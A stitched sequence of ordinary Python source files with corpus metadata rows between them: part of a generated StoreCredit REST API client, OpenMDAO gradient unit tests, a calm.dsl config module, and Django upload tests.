params['store_credit'] is None):
raise ValueError("Missing the required parameter `store_credit` when calling `create_store_credit`")
collection_formats = {}
path_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'store_credit' in params:
body_params = params['store_credit']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StoreCredit',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def delete_store_credit_by_id(cls, store_credit_id, **kwargs):
"""Delete StoreCredit
Delete an instance of StoreCredit by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_store_credit_by_id(store_credit_id, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._delete_store_credit_by_id_with_http_info(store_credit_id, **kwargs)
else:
(data) = cls._delete_store_credit_by_id_with_http_info(store_credit_id, **kwargs)
return data
@classmethod
def _delete_store_credit_by_id_with_http_info(cls, store_credit_id, **kwargs):
"""Delete StoreCredit
Delete an instance of StoreCredit by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_store_credit_by_id_with_http_info(store_credit_id, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['store_credit_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'store_credit_id' is set
if ('store_credit_id' not in params or
params['store_credit_id'] is None):
raise ValueError("Missing the required parameter `store_credit_id` when calling `delete_store_credit_by_id`")
collection_formats = {}
path_params = {}
if 'store_credit_id' in params:
path_params['storeCreditId'] = params['store_credit_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits/{storeCreditId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def get_store_credit_by_id(cls, store_credit_id, **kwargs):
"""Find StoreCredit
        Return a single instance of StoreCredit by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_store_credit_by_id(store_credit_id, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to return (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._get_store_credit_by_id_with_http_info(store_credit_id, **kwargs)
else:
(data) = cls._get_store_credit_by_id_with_http_info(store_credit_id, **kwargs)
return data
@classmethod
def _get_store_credit_by_id_with_http_info(cls, store_credit_id, **kwargs):
"""Find StoreCredit
        Return a single instance of StoreCredit by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_store_credit_by_id_with_http_info(store_credit_id, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to return (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['store_credit_id']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'store_credit_id' is set
if ('store_credit_id' not in params or
params['store_credit_id'] is None):
raise ValueError("Missing the required parameter `store_credit_id` when calling `get_store_credit_by_id`")
collection_formats = {}
path_params = {}
if 'store_credit_id' in params:
path_params['storeCreditId'] = params['store_credit_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits/{storeCreditId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StoreCredit',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def list_all_store_credits(cls, **kwargs):
"""List StoreCredits
Return a list of StoreCredits
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_all_store_credits(async=True)
>>> result = thread.get()
:param async bool
:param int page: page number
:param int size: page size
:param str sort: page order
:return: page[StoreCredit]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._list_all_store_credits_with_http_info(**kwargs)
else:
(data) = cls._list_all_store_credits_with_http_info(**kwargs)
return data
@classmethod
def _list_all_store_credits_with_http_info(cls, **kwargs):
"""List StoreCredits
Return a list of StoreCredits
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_all_store_credits_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param int page: page number
:param int size: page size
:param str sort: page order
:return: page[StoreCredit]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
if 'page' in params:
query_params.append(('page', params['page']))
if 'size' in params:
query_params.append(('size', params['size']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='page[StoreCredit]',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def replace_store_credit_by_id(cls, store_credit_id, store_credit, **kwargs):
"""Replace StoreCredit
Replace all attributes of StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_store_credit_by_id(store_credit_id, store_credit, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to replace (required)
:param StoreCredit store_credit: Attributes of storeCredit to replace (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._replace_store_credit_by_id_with_http_info(store_credit_id, store_credit, **kwargs)
else:
(data) = cls._replace_store_credit_by_id_with_http_info(store_credit_id, store_credit, **kwargs)
return data
@classmethod
def _replace_store_credit_by_id_with_http_info(cls, store_credit_id, store_credit, **kwargs):
"""Replace StoreCredit
Replace all attributes of StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_store_credit_by_id_with_http_info(store_credit_id, store_credit, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to replace (required)
:param StoreCredit store_credit: Attributes of storeCredit to replace (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['store_credit_id', 'store_credit']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'store_credit_id' is set
if ('store_credit_id' not in params or
params['store_credit_id'] is None):
raise ValueError("Missing the required parameter `store_credit_id` when calling `replace_store_credit_by_id`")
# verify the required parameter 'store_credit' is set
if ('store_credit' not in params or
params['store_credit'] is None):
raise ValueError("Missing the required parameter `store_credit` when calling `replace_store_credit_by_id`")
collection_formats = {}
path_params = {}
if 'store_credit_id' in params:
path_params['storeCreditId'] = params['store_credit_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'store_credit' in params:
body_params = params['store_credit']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits/{storeCreditId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StoreCredit',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def update_store_credit_by_id(cls, store_credit_id, store_credit, **kwargs):
"""Update StoreCredit
Update attributes of StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_store_credit_by_id(store_credit_id, store_credit, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to update. (required)
:param StoreCredit store_credit: Attributes of storeCredit to update. (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._update_store_credit_by_id_with_http_info(store_credit_id, store_credit, **kwargs)
else:
(data) = cls._update_store_credit_by_id_with_http_info(store_credit_id, store_credit, **kwargs)
return data
@classmethod
def _update_store_credit_by_id_with_http_info(cls, store_credit_id, store_credit, **kwargs):
"""Update StoreCredit
Update attributes of StoreCredit
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_store_credit_by_id_with_http_info(store_credit_id, store_credit, async=True)
>>> result = thread.get()
:param async bool
:param str store_credit_id: ID of storeCredit to update. (required)
:param StoreCredit store_credit: Attributes of storeCredit to update. (required)
:return: StoreCredit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['store_credit_id', 'store_credit']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'store_credit_id' is set
if ('store_credit_id' not in params or
params['store_credit_id'] is None):
raise ValueError("Missing the required parameter `store_credit_id` when calling `update_store_credit_by_id`")
# verify the required parameter 'store_credit' is set
if ('store_credit' not in params or
params['store_credit'] is None):
raise ValueError("Missing the required parameter `store_credit` when calling `update_store_credit_by_id`")
collection_formats = {}
path_params = {}
if 'store_credit_id' in params:
path_params['storeCreditId'] = params['store_credit_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'store_credit' in params:
body_params = params['store_credit']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/storeCredits/{storeCreditId}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StoreCredit',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
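# A minimal usage sketch of the ActiveRecord-style helpers defined above
# (illustrative only; it assumes ApiClient.instance() is configured elsewhere
# and that StoreCredit exposes an `id` attribute, as create() implies).
def _store_credit_usage_sketch():
    credits = StoreCredit.find_all(size=10)          # GET /storeCredits?size=10
    credit = StoreCredit.find_one_by(size=1)         # first match, or None
    if credit is not None:
        fetched = StoreCredit.find_by_id(credit.id)  # GET /storeCredits/{storeCreditId}
        fetched.delete()                             # DELETE /storeCredits/{storeCreditId}
    return credits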
| 33.450736
| 122
| 0.614314
| 3,370
| 29,537
| 5.102374
| 0.057864
| 0.093399
| 0.045362
| 0.028787
| 0.843094
| 0.794475
| 0.786333
| 0.778075
| 0.77191
| 0.765688
| 0
| 0.000433
| 0.296374
| 29,537
| 882
| 123
| 33.488662
| 0.826926
| 0.029082
| 0
| 0.640426
| 0
| 0
| 0.144787
| 0.035245
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.010638
| null | null | 0.004255
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
397a6b0709faf72d4f3d17e4cba5367524621398
| 10,656
|
py
|
Python
|
openmdao/core/test/test_calc_gradient.py
|
colinxs/OpenMDAO
|
a9a52be29281a23a102c64b577066ee5fc70f4b4
|
[
"Apache-2.0"
] | 17
|
2018-01-11T20:13:59.000Z
|
2022-03-22T03:46:05.000Z
|
openmdao/core/test/test_calc_gradient.py
|
colinxs/OpenMDAO
|
a9a52be29281a23a102c64b577066ee5fc70f4b4
|
[
"Apache-2.0"
] | 6
|
2017-10-19T23:14:14.000Z
|
2020-11-22T17:30:57.000Z
|
openmdao/core/test/test_calc_gradient.py
|
colinxs/OpenMDAO
|
a9a52be29281a23a102c64b577066ee5fc70f4b4
|
[
"Apache-2.0"
] | 10
|
2018-04-12T22:13:33.000Z
|
2020-05-07T10:02:59.000Z
|
""" Unit tests for the calc_gradient method on Problem. """
from __future__ import print_function
import unittest
import numpy as np
from numpy.testing import assert_almost_equal
from six import text_type, PY3
from openmdao.api import Problem, Group, IndepVarComp, ExecComp
from openmdao.test.simple_comps import RosenSuzuki, FanIn
if PY3:
def py3fix(s):
return s.replace('<type', '<class')
else:
def py3fix(s):
return s
#
# expected jacobian
#
expectedJ = {
'comp.f': {
'parm.x': np.array([
[ -3., -3., -17., 9.]
])
},
'comp.g': {
'parm.x': np.array([
[ 3., 1., 3., 1.],
[ 1., 4., 2., 3.],
[ 6., 1., 2., -1.],
])
}
}
expectedJ_array = np.concatenate((
expectedJ['comp.f']['parm.x'],
expectedJ['comp.g']['parm.x']
))
class TestCalcGradient(unittest.TestCase):
def test_calc_gradient_interface_errors(self):
root = Group()
prob = Problem(root=root)
root.add('comp', ExecComp('y=x*2.0'))
try:
prob.calc_gradient(['comp.x'], ['comp.y'], mode='junk')
except Exception as error:
msg = "mode must be 'auto', 'fwd', 'rev', or 'fd'"
self.assertEqual(text_type(error), msg)
else:
self.fail("Error expected")
try:
prob.calc_gradient(['comp.x'], ['comp.y'], return_format='junk')
except Exception as error:
msg = "return_format must be 'array' or 'dict'"
self.assertEqual(text_type(error), msg)
else:
self.fail("Error expected")
def test_calc_gradient(self):
root = Group()
root.add('parm', IndepVarComp('x', np.array([1., 1., 1., 1.])))
root.add('comp', RosenSuzuki())
root.connect('parm.x', 'comp.x')
prob = Problem(root)
prob.driver.add_desvar('parm.x', lower=-10, upper=99)
prob.driver.add_objective('comp.f')
prob.driver.add_constraint('comp.g', upper=0.)
prob.setup(check=False)
prob.run()
indep_list = ['parm.x']
unknown_list = ['comp.f', 'comp.g']
# check that calc_gradient returns proper dict value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'])
# check that calc_gradient returns proper array value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'])
# check that calc_gradient returns proper array value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'], decimal=5)
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'], decimal=5)
# check that calc_gradient returns proper array value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='array')
assert_almost_equal(J, expectedJ_array, decimal=5)
def test_calc_gradient_with_poi_indices(self):
p_idxs = [0, 1, 2, 4]
root = Group()
root.add('parm', IndepVarComp('x', np.array([1., 1., 1., 2., 1.])))
root.add('comp', RosenSuzuki())
root.connect('parm.x', 'comp.x', src_indices=p_idxs)
prob = Problem(root)
prob.driver.add_desvar('parm.x', indices=p_idxs, lower=-10, upper=99)
prob.driver.add_objective('comp.f')
prob.driver.add_constraint('comp.g', upper=0.)
prob.setup(check=False)
prob.run()
indep_list = ['parm.x']
unknown_list = ['comp.f', 'comp.g']
# check that calc_gradient returns proper dict value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'])
# check that calc_gradient returns proper array value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'])
# check that calc_gradient returns proper array value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'], decimal=5)
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'], decimal=5)
# check that calc_gradient returns proper array value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='array')
assert_almost_equal(J, expectedJ_array, decimal=5)
def test_calc_gradient_with_qoi_indices(self):
q_idxs = [0, 2]
root = Group()
root.add('parm', IndepVarComp('x', np.array([1., 1., 1., 1.])))
root.add('comp', RosenSuzuki())
root.connect('parm.x', 'comp.x')
prob = Problem(root)
prob.driver.add_desvar('parm.x', lower=-10, upper=99)
prob.driver.add_objective('comp.f')
prob.driver.add_constraint('comp.g', upper=0., indices=q_idxs)
prob.setup(check=False)
prob.run()
indep_list = ['parm.x']
unknown_list = ['comp.f', 'comp.g']
# override expected array value to reflect qoi indices
expectedJ_array = np.concatenate((
expectedJ['comp.f']['parm.x'],
expectedJ['comp.g']['parm.x'][q_idxs, :]
))
# check that calc_gradient returns proper dict value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'][q_idxs, :])
# check that calc_gradient returns proper array value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'])
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'][q_idxs, :])
# check that calc_gradient returns proper array value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='array')
assert_almost_equal(J, expectedJ_array)
# check that calc_gradient returns proper dict value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_almost_equal(J['comp.f']['parm.x'], expectedJ['comp.f']['parm.x'], decimal=5)
assert_almost_equal(J['comp.g']['parm.x'], expectedJ['comp.g']['parm.x'][q_idxs, :], decimal=5)
# check that calc_gradient returns proper array value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='array')
assert_almost_equal(J, expectedJ_array, decimal=5)
def test_calc_gradient_multiple_params(self):
prob = Problem()
prob.root = FanIn()
prob.setup(check=False)
prob.run()
indep_list = ['p1.x1', 'p2.x2']
unknown_list = ['comp3.y']
# check that calc_gradient returns proper dict value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_almost_equal(J['comp3.y']['p2.x2'], np.array([[35.]]))
assert_almost_equal(J['comp3.y']['p1.x1'], np.array([[-6.]]))
# check that calc_gradient returns proper array value when mode is 'fwd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='array')
assert_almost_equal(J, np.array([[-6., 35.]]))
# check that calc_gradient returns proper dict value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_almost_equal(J['comp3.y']['p2.x2'], np.array([[35.]]))
assert_almost_equal(J['comp3.y']['p1.x1'], np.array([[-6.]]))
# check that calc_gradient returns proper array value when mode is 'rev'
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='array')
assert_almost_equal(J, np.array([[-6., 35.]]))
# check that calc_gradient returns proper dict value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_almost_equal(J['comp3.y']['p2.x2'], np.array([[35.]]))
assert_almost_equal(J['comp3.y']['p1.x1'], np.array([[-6.]]))
# check that calc_gradient returns proper array value when mode is 'fd'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='array')
assert_almost_equal(J, np.array([[-6., 35.]]))
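# A minimal standalone sketch (not one of the tests above) of the calc_gradient
# call pattern this suite exercises, assuming the same legacy OpenMDAO 1.x API:
def _example_calc_gradient():
    root = Group()
    root.add('p', IndepVarComp('x', 3.0))
    root.add('comp', ExecComp('y=x*2.0'))
    root.connect('p.x', 'comp.x')
    prob = Problem(root)
    prob.setup(check=False)
    prob.run()
    # For y = 2*x the Jacobian entry dy/dx is the constant 2.0.
    return prob.calc_gradient(['p.x'], ['comp.y'], mode='fwd', return_format='dict')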
if __name__ == "__main__":
unittest.main()
| 42.118577
| 103
| 0.626408
| 1,502
| 10,656
| 4.261651
| 0.08988
| 0.104984
| 0.098266
| 0.101234
| 0.880956
| 0.869395
| 0.860334
| 0.860334
| 0.845805
| 0.839713
| 0
| 0.012813
| 0.21631
| 10,656
| 252
| 104
| 42.285714
| 0.753682
| 0.16967
| 0
| 0.713415
| 0
| 0
| 0.125596
| 0
| 0
| 0
| 0
| 0
| 0.237805
| 1
| 0.042683
| false
| 0
| 0.042683
| 0.012195
| 0.103659
| 0.006098
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
397d8aa637be1b8c1d921c41918b0b081405da59
| 252
|
py
|
Python
|
calm/dsl/config/__init__.py
|
tonyjames/calm-dsl
|
e94a35e26a43a0081d6487a538675641fc1d3667
|
[
"Apache-2.0"
] | null | null | null |
calm/dsl/config/__init__.py
|
tonyjames/calm-dsl
|
e94a35e26a43a0081d6487a538675641fc1d3667
|
[
"Apache-2.0"
] | null | null | null |
calm/dsl/config/__init__.py
|
tonyjames/calm-dsl
|
e94a35e26a43a0081d6487a538675641fc1d3667
|
[
"Apache-2.0"
] | 1
|
2020-02-13T02:56:58.000Z
|
2020-02-13T02:56:58.000Z
|
from .config import (
get_config,
init_config,
print_config,
get_default_user_config_file,
set_config,
)
__all__ = [
"get_config",
"init_config",
"print_config",
"get_default_user_config_file",
"set_config",
]
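# Typical import-and-call sketch for the helpers re-exported above; the
# zero-argument call is an assumption about the calm.dsl.config API, shown
# for orientation only:
#
#   from calm.dsl.config import get_config
#   config = get_config()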
| 14.823529
| 35
| 0.654762
| 30
| 252
| 4.833333
| 0.366667
| 0.124138
| 0.17931
| 0.262069
| 0.868966
| 0.868966
| 0.868966
| 0.868966
| 0.868966
| 0.868966
| 0
| 0
| 0.242063
| 252
| 16
| 36
| 15.75
| 0.759162
| 0
| 0
| 0
| 0
| 0
| 0.281746
| 0.111111
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
397e037edd923591e8d1bedd7452dad22ef8ff0f
| 2,472
|
py
|
Python
|
system/test.py
|
PDF2CASH/PDF2CASH_CloudUpdater
|
94b59831b9c34dbd97c84a607f17a1958588deab
|
[
"MIT"
] | 1
|
2018-10-17T14:21:42.000Z
|
2018-10-17T14:21:42.000Z
|
system/test.py
|
PDF2CASH/PDF2CASH_CloudUpdater
|
94b59831b9c34dbd97c84a607f17a1958588deab
|
[
"MIT"
] | null | null | null |
system/test.py
|
PDF2CASH/PDF2CASH_CloudUpdater
|
94b59831b9c34dbd97c84a607f17a1958588deab
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
import json
class SystemTest(TestCase):
    def test_post_1(self):
        url = '/api/system/pdftoinvoice/'
        # Context managers close the fixture file after each upload.
        with open("system/test.zip", 'rb') as file:
            response = self.client.post(url, {'file': file}, format='multipart')
        self.assertEqual(response.status_code, 200)
    def test_post_2(self):
        url = '/api/system/bi/'
        with open("system/test.zip", 'rb') as file:
            response = self.client.post(url, {'file': file}, format='multipart')
        self.assertEqual(response.status_code, 200)
    def test_post_3(self):
        url = '/api/system/frontend/'
        with open("system/test.zip", 'rb') as file:
            response = self.client.post(url, {'file': file}, format='multipart')
        self.assertEqual(response.status_code, 200)
    def test_post_4(self):
        url = '/api/system/management/'
        with open("system/test.zip", 'rb') as file:
            response = self.client.post(url, {'file': file}, format='multipart')
        self.assertEqual(response.status_code, 200)
    def test_version(self):
        url = '/api/system/management/'
        with open("system/test.zip", 'rb') as file:
            response = self.client.post(url, {'file': file}, format='multipart')
        self.assertEqual(json.loads(response.content)[1]['version'], 1)
        url = '/api/system/frontend/'
        with open("system/test.zip", 'rb') as file:
            response = self.client.post(url, {'file': file}, format='multipart')
        self.assertEqual(json.loads(response.content)[1]['version'], 2)
    def test_get_4(self):
        # Each upload bumps the shared version counter (see test_version), so
        # post to all four endpoints in order before checking the version below.
        for url in ('/api/system/pdftoinvoice/', '/api/system/bi/',
                    '/api/system/frontend/', '/api/system/management/'):
            with open("system/test.zip", 'rb') as file:
                self.client.post(url, {'file': file}, format='multipart')
        url = '/api/system/zip/'
        response = self.client.get(url)
        self.assertNotEqual(response.content, b'')
        url = '/api/system/version/'
        response = self.client.get(url)
        self.assertEqual(json.loads(response.content)['version'], 4)
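# The four upload tests above differ only in their endpoint; a shared helper
# (hypothetical name `_post_zip`, not part of the original suite) they could
# delegate to would look like:
#
#   def _post_zip(self, url):
#       with open("system/test.zip", 'rb') as file:
#           return self.client.post(url, {'file': file}, format='multipart')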
| 41.2
| 76
| 0.602751
| 302
| 2,472
| 4.884106
| 0.135762
| 0.048814
| 0.097627
| 0.122034
| 0.865085
| 0.863729
| 0.825763
| 0.825763
| 0.825763
| 0.825763
| 0
| 0.01144
| 0.222087
| 2,472
| 59
| 77
| 41.898305
| 0.75559
| 0
| 0
| 0.705882
| 0
| 0
| 0.230178
| 0.073625
| 0
| 0
| 0
| 0
| 0.156863
| 1
| 0.117647
| false
| 0
| 0.039216
| 0
| 0.176471
| 0
| 0
